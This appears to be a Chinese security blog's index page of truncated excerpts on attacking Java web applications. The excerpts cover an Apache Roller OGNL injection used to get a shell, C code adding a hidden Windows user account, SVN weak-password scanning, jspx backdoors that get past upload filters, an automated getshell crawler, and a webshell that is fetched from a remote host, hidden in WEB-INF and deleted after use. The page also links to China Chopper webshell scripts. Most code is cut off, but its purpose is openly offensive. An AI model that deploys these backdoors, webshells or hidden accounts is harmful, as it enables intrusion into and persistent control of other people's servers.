Java login SSH
Java连接并登陆SSH(需要用到的jar包-ganymed-ssh2-build210.jar): package org.javaweb.util; import java.io.IOException; import ch.ethz.ssh2.Connection; public class Ssh { public boolean login(String host,int port,St...
阅读全文Java连接并登陆SSH(需要用到的jar包-ganymed-ssh2-build210.jar): package org.javaweb.util; import java.io.IOException; import ch.ethz.ssh2.Connection; public class Ssh { public boolean login(String host,int port,St...
阅读全文如果只找到数据源的情况下可以直接用数据源的名连接数据库,不需要找到具体的密码。 <%@page import="java.io.File"%> <%@page import="java.io.FileWriter"%> <%@page import="java.io.BufferedWriter"%> ...
阅读全文在exp有个Apache Roller OGNL Injection:http://www.exploit-db.com/exploits/29859/ 好牛B的感觉,下载了几个Apache Roller的版本,好吧。 roller5.00:struts2-core-2.2.1.jar roller5.01:struts2-core-2.2.3.1.jar 剩下的不许多少Struts getshe...
阅读全文#include <windows.h> #include <lm.h> #pragma comment(lib,"netapi32") int main() { USER_INFO_1 u; DWORD dwError=0; u.usri1_name=L"tomcat"; u.usri1_password=L"admin8...
阅读全文很多扫描SVN工具都是扫描的.svn文件,不能通过端口去扫描SVN。Java有SVN的扩展库,已实现了SVN客户端的所有功能。 SVN有个未授权访问问题,默认不开启。一般人都会设置必须登录才能访问资源,但不排除少部分偷懒的人。其次就是SVN弱口令了。 svnserve.conf: authz-db = authz 去年写了个简单的SVN客户端放着也没用。下面给的一个认证的demo程序,需要jar包...
阅读全文最新更新了后门篇,记录了下JavaWeb后门相关东东。 攻击JavaWeb应用[1-8].pdf 攻击JavaWeb应用[1-8].doc 内容: 攻击JavaWeb应用[1]-JavaEE 基础 攻击JavaWeb应用[2]-CS交互安全 攻击JavaWeb应用[3]-SQL注入[1] 攻击JavaWeb应用[4]-SQL注入[2] 攻击JavaWeb应用[5]-MVC安全 攻击JavaWeb应...
阅读全文关于JavaWeb后门问题一直以来都比较少,而比较新奇的后门更少。在这里我分享两个我最近搞的比较有意思的JavaWeb后门给大家玩。一个常见或者比较普通的后门很容易就会被拦截或者被发现,但不知道有朋友了解下面两种后门没? 1:jspx后门 在如今的web应用当中如果想直接传个jsp已经变得比较难了,但是如果只限制了asp、php、jsp、aspx等这些常见的后缀应该怎样去突破呢?我在读tomcat...
阅读全文这个很简单的,改下main的str的关键字就可以自动getshell并倒入mongodb数据库。 [只需要添加jsoup和mongodb的jar包] import java.io.IOException; import java.net.URL; import java.net.URLConnection; import java.net.UnknownHostException; import ...
阅读全文我的思路是先从远程读取要生成的shell内容,然后把shell藏在WEB-INF下shell的名字和长度也都随机生成。比如: 不过就算藏在WEB-INF下也会被发现,干脆用一次就删一次?这样不会在任何目录下留下Shell。 菜刀链接:http://localhost/Demo2/new.jsp?url=http://xsser.me/caidao/css.jsp <%@ page langu...
阅读全文脚本下载地址: JSP脚本:http://xsser.me/caidao/css.jsp Jspx脚本:http://xsser.me/caidao/jspx.jspx Jspf脚本:http://xsser.me/caidao/css.jspf 详情:http://xsser.me/caidao/1.txt 修复上一版BUG: 1、修复Oracle无setCatalog的BUG。&n...
阅读全文